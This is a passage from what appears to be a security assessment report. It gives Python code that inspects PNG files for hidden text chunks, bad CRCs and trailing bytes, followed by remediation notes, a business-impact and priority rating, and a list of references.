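    else:                                     # iTXt: flag, method, lang\0, translated\0, text
        compressed = rest[0] == 1
        _, _, rest = rest[2:].partition(b"\x00")
        _, _, rest = rest.partition(b"\x00")
        text = zlib.decompress(rest) if compressed else rest
    return keyword.decode("latin-1"), text.decode("utf-8", "replace")


def analyze_png(png: bytes) -> dict:
    """Walk the chunk list and report text chunks, CRC mismatches and bytes after IEND."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    report = {"chunks": [], "text": [], "bad_crc": [], "trailing_bytes": 0, "truncated": False}
    pos = len(PNG_SIGNATURE)
    while True:
        if pos + 8 > len(png):
            report["truncated"] = True
            break
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        end = pos + 12 + length
        if end > len(png):
            report["truncated"] = True
            break
        data = png[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", png[pos + 8 + length:end])
        name = ctype.decode("ascii", "replace")
        report["chunks"].append(name)
        if crc != (zlib.crc32(ctype + data) & 0xFFFFFFFF):
            report["bad_crc"].append(name)
        if ctype in TEXT_CHUNKS:
            report["text"].append(_decode_text(ctype, data))
        pos = end
        if ctype == b"IEND":
            report["trailing_bytes"] = len(png) - pos   # a viewer ignores these bytes; a reviewer should not
            break
    return report


def is_suspicious(report: dict) -> bool:
    """Anything beyond plain image data deserves a look before the file is published."""
    return bool(report["text"] or report["bad_crc"] or report["trailing_bytes"] or report["truncated"])


if __name__ == "__main__":
    for label, png in (("clean", build_sample_png(False)), ("hidden", build_sample_png(True))):
        rep = analyze_png(png)
        print(f"{label}: chunks={rep['chunks']} text={rep['text']} trailing={rep['trailing_bytes']}")
```

To run it over real files, read each PNG in binary mode and pass the bytes to `analyze_png`; a clean image shows only `IHDR`, `IDAT` (possibly several) and `IEND`, no text, and zero trailing bytes. The `exiftool -all=` command from step 2 removes the text chunks but leaves trailing data in place, which is why both checks are needed.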

#### Business Impact

Information leaks from image files can lead to **data breaches, reputational damage, and regulatory fines** if sensitive data is exposed. Implementing the recommended practices helps ensure the privacy and security of critical data shared internally or externally.

#### Priority: Medium to High

Depending on the nature of the data being shared, this issue can range from moderate to critical. Immediate action is recommended for environments handling sensitive or confidential data.

## 6- References

* Dr. Hussein Bakri Lecture Notes
* ChatGPT
* <https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/>
* <https://security.paloaltonetworks.com/PAN-SA-2020-0007>
* <https://terrapin-attack.com/>
* <https://www.exploit-db.com/search>
* <https://crackstation.net/>
* <https://pentestmonkey.net/cheat-sheet/ssh-cheat-sheet>
* <https://thehackernews.com/2024/11/decades-old-security-vulnerabilities.html>
* <https://ubuntu.com/security/notices/USN-5355-1>
* <https://medium.com/@nirvana.elahi/title-llmnr-link-local-multicast-name-resolution-exploring-its-functionality-vulnerabilities-407fb69fb509>
* <https://privsec.harvard.edu/use-strong-passwords>
* <https://www.bu.edu/tech/support/information-security/security-for-everyone/how-to-choose-a-strong-password/>
* <https://www.one.com/en/website-security/create-a-secure-password>
* <https://docs.kernel.org/security/self-protection.html>
* <https://www.briskinfosec.com/blogs/blogsdetail/How-hackers-bypass-file-upload-and-how-to-prevent-it->
* <https://blog.devsecopsguides.com/file-upload-vulnerabilities>
* <https://www.exploit-db.com/exploits/42275>

